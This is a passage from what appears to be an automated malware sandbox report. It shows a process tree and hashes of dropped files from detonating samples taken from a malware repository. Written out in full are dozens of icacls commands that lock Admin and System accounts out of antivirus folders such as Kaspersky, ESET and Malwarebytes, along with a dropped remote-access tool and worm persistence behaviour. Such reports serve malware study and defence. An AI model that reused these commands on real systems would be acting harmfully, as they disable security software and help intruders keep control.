                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3920
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                        2⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5776
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:5096
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                        2⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5564
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:5368
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                                                                                                        2⤵
                                                                                                                                                          PID:6028
                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                            icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies file permissions
                                                                                                                                                            PID:5308
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6012
                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies file permissions
                                                                                                                                                              PID:2152
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2332
                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                PID:732
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                              2⤵
                                                                                                                                                                PID:960
                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                  icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                  PID:3012
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:448
                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:4228
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2140
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                      PID:4232
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1196
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:3120
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4924
                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                          icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                          PID:4100
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1696
                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                            PID:5396
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:6136
                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                              icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                              PID:5092
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4308
                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                PID:1876
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:932
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1172
                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:6124
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1376
                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                      PID:808
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4108
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:2700
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1716
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:1452
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3512
                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                            icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                            PID:4300
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2316
                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                              PID:3656
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2680
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                PID:3636
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5928
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:1464
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:6104
                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:4144
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4160
                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:1608
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5784
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:2212
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4684
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                          PID:1220
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5304
                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1764
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:2548
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:5368
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:5432
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:336
                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                  icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:6020
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4788
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5364
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:4556
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:2172
                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1152
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                          icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          PID:4068
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:1752
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                            icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                            PID:6028
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:2052
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                              icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              PID:5152
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:3016
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:1432
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:5532
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                  icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                  PID:448
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5552
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:1792
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5416
                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3152
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                        icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                        PID:3208
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:6076
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                          icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                          PID:2792
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:1576
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                            icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:4208
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4844
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                              PID:1508
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:5340
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                PID:4776
                                                                                                                                                                                                                                          • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                            C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                            PID:5064
                                                                                                                                                                                                                                            • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                              C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                              PID:2188
                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                PID:4424
                                                                                                                                                                                                                                            • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                              C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:2368
                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Worm\Fagot.a.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Worm\Fagot.a.exe"
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Modifies WinLogon for persistence
                                                                                                                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                                                            • Manipulates Digital Signatures
                                                                                                                                                                                                                                            • Impair Defenses: Safe Mode Boot
                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                            • Modifies Internet Explorer start page
                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                            PID:3832
                                                                                                                                                                                                                                          • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                            "LogonUI.exe" /flags:0x0 /state0:0xa396a855 /state1:0x41c64e6d
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:5752
                                                                                                                                                                                                                                            • C:\Windows\System32\smss.exe
                                                                                                                                                                                                                                              \SystemRoot\System32\smss.exe 000000c0 0000008c
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:6012
                                                                                                                                                                                                                                              • C:\Windows\System32\smss.exe
                                                                                                                                                                                                                                                \SystemRoot\System32\smss.exe 0000010c 0000008c
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:2332
                                                                                                                                                                                                                                                • C:\Windows\System32\smss.exe
                                                                                                                                                                                                                                                  \SystemRoot\System32\smss.exe 00000124 0000008c
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:448
                                                                                                                                                                                                                                                  • C:\Windows\System32\smss.exe
                                                                                                                                                                                                                                                    \SystemRoot\System32\smss.exe 00000124 0000008c
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:960

                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      3.0MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      81aab57e0ef37ddff02d0106ced6b91e

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      6e3895b350ef1545902bd23e7162dfce4c64e029

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a70f9e100dddb177f68ee7339b327a20cd9289fae09dcdce3dbcbc3e86756287

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      a651d0a526d31036a302f7ef1ee2273bb7c29b5206c9b17339baa149dd13958ca63db827d09b4e12202e44d79aac2e864522aca1228118ba3dcd259fe1fcf717

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Butterfly on Desktop\license.txt

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      285f01ecae16a7250a83d64a2cc8e933

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      099d91ca59f78687a75de7e4f7bcb05fb5a52b1f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      dced13031362f7160fec3eedf4c45bb6ba5f0600b6054a7ff1c1f98a3c77cc89

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      e0b0fca671fdcc1f1a7dc021aa061a78889a927793ffba5564c2cfe6b9055798ff7c3d6a0aaae1d7ba79b93dc82737383ef6093439a9c220dbf7985fb5349d61

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Butterfly on Desktop\unins000.dat

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

